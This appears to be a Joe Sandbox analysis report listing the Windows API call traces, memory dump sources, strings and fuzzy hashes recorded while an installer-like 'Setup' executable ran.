                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000001), ref: 6394F4C4
                                                                                                • Part of subcall function 6394F527: GetWindowPlacement.USER32(00000000,?,00000000), ref: 6394F550
                                                                                                • Part of subcall function 6394F527: SetWindowPlacement.USER32(00000000,0000002C), ref: 6394F561
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ItemLongPlacementShow$CallbackDispatcherTextUser
                                                                                              • String ID:
                                                                                              • API String ID: 3090988947-0
                                                                                              • Opcode ID: 15809a826bf49ac134bfb54a3b1863ac128e1f4ca28ef83d42a8c127cc005842
                                                                                              • Instruction ID: 615b97a68e75483917491d21314079541cc6d5ee766a8d53919022477036f84e
                                                                                              • Opcode Fuzzy Hash: 15809a826bf49ac134bfb54a3b1863ac128e1f4ca28ef83d42a8c127cc005842
                                                                                              • Instruction Fuzzy Hash: FE21293A2042059FCB10AF68C498D597BE5EF8A768B164294FD0ADF3A6CB31DC11CF81
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: __recalloc$H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 59120599-0
                                                                                              • Opcode ID: d9e941057cea9de26c270b2d0f7acce881c586e08e9fde84964bd1c5dff4bd8e
                                                                                              • Instruction ID: 765dc7a7ca6090ac073025d03c2b7288c534e7a08a6d910a214b081ab09b42c3
                                                                                              • Opcode Fuzzy Hash: d9e941057cea9de26c270b2d0f7acce881c586e08e9fde84964bd1c5dff4bd8e
                                                                                              • Instruction Fuzzy Hash: D1113C71502306DFE720DF68C980B59B7E4EB15A68F148828F9EACB350D731E8508F40
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E76C2
                                                                                                • Part of subcall function 6C8E75C2: __EH_prolog3.LIBCMT ref: 6C8E75C9
                                                                                                • Part of subcall function 6C8E75C2: OpenFileMappingW.KERNEL32(00000002,00000000,00000000,?,6C8BAB18,00000008,6C8E76FE,?,?,00000004,6C90C454,?,6C8B95D4,00000000,00000001,?), ref: 6C8E75F2
                                                                                                • Part of subcall function 6C8E75C2: GetLastError.KERNEL32(?,?,?,?,00000001), ref: 6C8E75FF
                                                                                              • OpenEventW.KERNEL32(00100002,00000000,00000000,?,?,00000004,6C90C454,?,6C8B95D4,00000000,00000001,?,6C8BA794,?,00000001,?), ref: 6C8E770B
                                                                                              • OpenFileMappingW.KERNEL32(00000002,00000000,00000000,?,?,?,?,00000001), ref: 6C8E771B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open$FileH_prolog3Mapping$ErrorEventLast
                                                                                              • String ID:
                                                                                              • API String ID: 1631330826-0
                                                                                              • Opcode ID: 562bb95a53687ee778a89e206030dbbbf779f192aa9e4e2a00045a9b34c0ba9d
                                                                                              • Instruction ID: 1c3b82b55755444003a0c204cd970c7610af3554cbead51639cff2b7574061cb
                                                                                              • Opcode Fuzzy Hash: 562bb95a53687ee778a89e206030dbbbf779f192aa9e4e2a00045a9b34c0ba9d
                                                                                              • Instruction Fuzzy Hash: 5F115EB1600306EFCB20CF64C942B99BBB0BF59314F108959F8589BB91C770E828CF94
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00000001,?,?,?,?,?,6C9035F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C8CC426
                                                                                              • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,6C900F4A,00000004,?,?,?,6C9035F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType), ref: 6C8CC43F
                                                                                              • RegCloseKey.KERNEL32(?,?,?,?,6C9035F5,?,SYSTEM\CurrentControlSet\Control\Windows,?,?,CSDReleaseType,?,02F92298,00000004,6C900F4A,?), ref: 6C8CC44E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3677997916-0
                                                                                              • Opcode ID: 62373634f74180bd9e5564859d3abaf7d0de082cefc96d3de27724e49c8802cc
                                                                                              • Instruction ID: 35fa1f3f3c50e5dddb3d3b08e70436f01dd0effa9ce91e8a464e77913e510b30
                                                                                              • Opcode Fuzzy Hash: 62373634f74180bd9e5564859d3abaf7d0de082cefc96d3de27724e49c8802cc
                                                                                              • Instruction Fuzzy Hash: BFF03C76200108FFEB10DFA5CC86EAE7B7DEF113A8F108215F91196290D775DE54AB61
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C7CEF
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C7EE4: __EH_prolog3.LIBCMT ref: 6C8C7EEB
                                                                                                • Part of subcall function 6C8C5DD0: __EH_prolog3.LIBCMT ref: 6C8C5DD7
                                                                                                • Part of subcall function 6C8C5485: __EH_prolog3.LIBCMT ref: 6C8C548C
                                                                                                • Part of subcall function 6C8C5485: GetModuleHandleW.KERNEL32(kernel32.dll,0000002C,6C8C7DAF,?,?,?,?,?,00000000,?,?,6C8BAB18,00000008,6C8C7CD9), ref: 6C8C549C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$HandleModule
                                                                                              • String ID: Unknown
                                                                                              • API String ID: 1530205010-1654365787
                                                                                              • Opcode ID: 0f3d658dc69fab1e30f65b08dd7e9c21148370536474c6510b1d6c6f18c19a61
                                                                                              • Instruction ID: 502e439a8f12afb97bbc0e569f03baa40eebe268146f2f459f0dbaa43fed34c9
                                                                                              • Opcode Fuzzy Hash: 0f3d658dc69fab1e30f65b08dd7e9c21148370536474c6510b1d6c6f18c19a61
                                                                                              • Instruction Fuzzy Hash: 0C316D716147099AD728DFB8C842BEBB3A4BF25314F504E2EA165C7BC0DB30E9089755
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F4ADD
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8F8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9099FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C8F8E6E
                                                                                                • Part of subcall function 6C918EAB: _memcpy_s.LIBCMT ref: 6C918EFC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$AppendPath_memcpy_s
                                                                                              • String ID: %TEMP%
                                                                                              • API String ID: 3727483831-235365282
                                                                                              • Opcode ID: 0a67a1915982974efc23656a9c2e08fcf36e13bfd280f0490b0a15d0a4eb66ae
                                                                                              • Instruction ID: f72710894f930d0cd6839d445a82c7a238efbe8d910d040837653858af096061
                                                                                              • Opcode Fuzzy Hash: 0a67a1915982974efc23656a9c2e08fcf36e13bfd280f0490b0a15d0a4eb66ae
                                                                                              • Instruction Fuzzy Hash: 2321713291010E9BCF10DBBCCA427EEB7B5AF21328F140A65E060EBBD5C774DA199751
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D267E
                                                                                                • Part of subcall function 6C8C89B7: __EH_prolog3.LIBCMT ref: 6C8C89BE
                                                                                                • Part of subcall function 6C8C89B7: __CxxThrowException@8.LIBCMT ref: 6C8C8A89
                                                                                                • Part of subcall function 6C8D2811: __EH_prolog3.LIBCMT ref: 6C8D2818
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: ReturnCode
                                                                                              • API String ID: 2489616738-1214168914
                                                                                              • Opcode ID: 32ee4683ec2d760e36b23cba43af05465d7c354d5b90af1524107f131affc804
                                                                                              • Instruction ID: e51ecc36eb919647dc8e9cea96ce51b367decc93c31c2bdcf3497655d4e04597
                                                                                              • Opcode Fuzzy Hash: 32ee4683ec2d760e36b23cba43af05465d7c354d5b90af1524107f131affc804
                                                                                              • Instruction Fuzzy Hash: F621A1B0510215DFCF20CFACC981A9E7BA8BF19718B14895AF424DF785C770D914CBA0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: %TEMP%
                                                                                              • API String ID: 431132790-235365282
                                                                                              • Opcode ID: 02fa29a427c351ee56b8c9c44297d7c84a84fb8bf18edd1e6f01c7859527a175
                                                                                              • Instruction ID: 2e63aa7ae448d2b52c80fad4db4e4cb0bb2aa39f77565d12d3e0f3ae27d49c90
                                                                                              • Opcode Fuzzy Hash: 02fa29a427c351ee56b8c9c44297d7c84a84fb8bf18edd1e6f01c7859527a175
                                                                                              • Instruction Fuzzy Hash: 85214271610219AFDF00DFA0CD49AEE7775FF14319F104524F921AAA90CB74DA15DBA4
                                                                                              APIs
                                                                                              • GetCommandLineW.KERNEL32(38D98A99,6C8F831D,?,00000000,6C934C14,000000FF,?,6C8F7793,?,00000000), ref: 6C9092BF
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                                • Part of subcall function 6C8C3A16: __EH_prolog3.LIBCMT ref: 6C8C3A1D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CommandLine
                                                                                              • String ID: repair
                                                                                              • API String ID: 1384747822-2397320225
                                                                                              • Opcode ID: 3933ee0195a7ad5b1f99a7637240fe043034749be286474ae0ef3f7d84a6742e
                                                                                              • Instruction ID: 22a905d00ef30c69d6b32259f217806c05f6f644272da679fa08e8a651956037
                                                                                              • Opcode Fuzzy Hash: 3933ee0195a7ad5b1f99a7637240fe043034749be286474ae0ef3f7d84a6742e
                                                                                              • Instruction Fuzzy Hash: 7D11B632658740ABC710DB58CD41BDAB3DCEB8A738F150E2EB96597AD0DB30E5448A82
                                                                                              APIs
                                                                                              • GetWindowPlacement.USER32(?,?), ref: 6394FF6A
                                                                                                • Part of subcall function 639676EE: _calloc.LIBCMT ref: 6396770F
                                                                                                • Part of subcall function 639683CE: __CxxThrowException@8.LIBCMT ref: 639683E2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8PlacementThrowWindow_calloc
                                                                                              • String ID: ,
                                                                                              • API String ID: 1982324250-3772416878
                                                                                              • Opcode ID: 3ec933395b5b2377952e2523a04e2f2daa64e470d8de8d5ab6a5a8d6922cad34
                                                                                              • Instruction ID: 8af9d671cb0da918a362311f4e212399892b4c4bebcc6f076ee2b53ab1db3b83
                                                                                              • Opcode Fuzzy Hash: 3ec933395b5b2377952e2523a04e2f2daa64e470d8de8d5ab6a5a8d6922cad34
                                                                                              • Instruction Fuzzy Hash: F0114C72905309AFDB00DFA8D88099EF7F9FB4A714B21442AE859E7200D730F940CFA0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Entering Function
                                                                                              • API String ID: 431132790-2002471330
                                                                                              • Opcode ID: b5a450b1e38a2570ba9ea04e2bc10f8741731c63668d3972b6cb73b2f0dd153a
                                                                                              • Instruction ID: 57125ae82b61c30876614350ac48f8afdd446e8fa3933b42985d67c87dbb04b4
                                                                                              • Opcode Fuzzy Hash: b5a450b1e38a2570ba9ea04e2bc10f8741731c63668d3972b6cb73b2f0dd153a
                                                                                              • Instruction Fuzzy Hash: 25F032356002019FDB20DF68C941B9DB7E0EF64714F10C809E885CBB14CB38EC60DB40
                                                                                              APIs
                                                                                              Strings
                                                                                              • exiting function/method, xrefs: 6C8C38EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: exiting function/method
                                                                                              • API String ID: 431132790-2452647166
                                                                                              • Opcode ID: 393651330c407160ceae5cfdda2ad0fc930f0a8b5b45c360640d4f9603247c5b
                                                                                              • Instruction ID: 1866c6c09129283558223d058b6fe8eba1df96bc29f042fdbb4a3e1c625daed3
                                                                                              • Opcode Fuzzy Hash: 393651330c407160ceae5cfdda2ad0fc930f0a8b5b45c360640d4f9603247c5b
                                                                                              • Instruction Fuzzy Hash: 9FE0E5352106019FD710DFA8C159B89B7A2FF68315F108498E6958FBA4CB35EC24DB51
                                                                                              APIs
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000424,6C8E772B,?,?,?,?,00000001), ref: 6C8E739A
                                                                                              Strings
                                                                                              • The handle to the section is Null, xrefs: 6C8E7380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID: The handle to the section is Null
                                                                                              • API String ID: 3314676101-179083574
                                                                                              • Opcode ID: ed1c81f753d23a3beeb351a506d665bfcc28719ca17a24c3a06e9cec122a305b
                                                                                              • Instruction ID: e83fd81415b8406680554feee91f1198fca2449a573b1646949745bff662d814
                                                                                              • Opcode Fuzzy Hash: ed1c81f753d23a3beeb351a506d665bfcc28719ca17a24c3a06e9cec122a305b
                                                                                              • Instruction Fuzzy Hash: 78E0BFB0784702AFE7708F699E06B057AE0AF09704F50CC19B655EAA91D671E4408B44
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNELBASE(RICHED20.DLL,?,6395CA98,00000000,00000001,?,80070057,63945D9C,?,00000030,80070057), ref: 639509C9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID: RICHED20.DLL
                                                                                              • API String ID: 1029625771-992299850
                                                                                              • Opcode ID: e772bdfde2e95b593c03a3931c4fc942a39b531f169ad9143a387f799a591c52
                                                                                              • Instruction ID: 1e44a911e35a0d24920b5961c1ce163851d64a5510bcbf2a14b6bb5080c7f458
                                                                                              • Opcode Fuzzy Hash: e772bdfde2e95b593c03a3931c4fc942a39b531f169ad9143a387f799a591c52
                                                                                              • Instruction Fuzzy Hash: C6E0FEB1905B409F87609F6BE544542FBF8BFAAA113104A1FD09AC6A25D3B0A1458F54
                                                                                              APIs
                                                                                              • ctype.LIBCPMT ref: 6C5E2015
                                                                                              • ctype.LIBCPMT ref: 6C5E202A
                                                                                                • Part of subcall function 6C5D17EB: malloc.MSVCRT ref: 6C5D17F6
                                                                                                • Part of subcall function 6C5D2885: InitializeCriticalSectionAndSpinCount.KERNEL32(00000004,00000FA0,?,00000000,00000000), ref: 6C5D28C4
                                                                                                • Part of subcall function 6C5D3992: EnterCriticalSection.KERNEL32(?,00000000,6C5D397F,00000000,6C5D371E,80004005), ref: 6C5D39AE
                                                                                                • Part of subcall function 6C5D2C9B: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,6C5D27B0,00000000,6C5F0088), ref: 6C5D2D01
                                                                                                • Part of subcall function 6C5D2C9B: VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,000003F8,00000000,?,?,?,?,6C5D27B0,00000000,6C5F0088), ref: 6C5D2D4F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocCriticalSectionVirtualctype$CountEnterInitializeSpinmalloc
                                                                                              • String ID:
                                                                                              • API String ID: 738331480-0
                                                                                              • Opcode ID: 1791fbcc9bc8fb1bf8dbd8aefbabfc203cfcc86397cde3a3353af89b496b949a
                                                                                              • Instruction ID: abc6c4b08b699f9eb15e7ec5a48eef2ae818d32353b8874c3aba7f570fabe8ce
                                                                                              • Opcode Fuzzy Hash: 1791fbcc9bc8fb1bf8dbd8aefbabfc203cfcc86397cde3a3353af89b496b949a
                                                                                              • Instruction Fuzzy Hash: D671B030245381EBDB148F19CC84F9A3AE5BB89308F664869E525DBEA2C771E845CF54
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C90D780
                                                                                                • Part of subcall function 6C8E3096: __EH_prolog3.LIBCMT ref: 6C8E309D
                                                                                              • InitializeCriticalSection.KERNEL32(0000000C), ref: 6C90D96A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CriticalInitializeSection
                                                                                              • String ID:
                                                                                              • API String ID: 1185523453-0
                                                                                              • Opcode ID: 3fc06d3155f92bc62115b13950e359060fa565287ef26adc1e6dbb5259f1d79f
                                                                                              • Instruction ID: 289df8d8d5881603c343c804346b92288a194854773ef78b618e69a3b9ff60e9
                                                                                              • Opcode Fuzzy Hash: 3fc06d3155f92bc62115b13950e359060fa565287ef26adc1e6dbb5259f1d79f
                                                                                              • Instruction Fuzzy Hash: 42616D7560164ADFCF01CF68C584BCEBBB4BF19308F148559E958AB341C774EA19CBA1
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395299D
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00000008,639550CF,639671D0,?,639671D0,?,?,?,00000000,63955C04,?,?), ref: 63952A79
                                                                                                • Part of subcall function 63960717: __EH_prolog3.LIBCMT ref: 6396071E
                                                                                                • Part of subcall function 63960717: __recalloc.LIBCMT ref: 63960766
                                                                                              Memory Dump Source
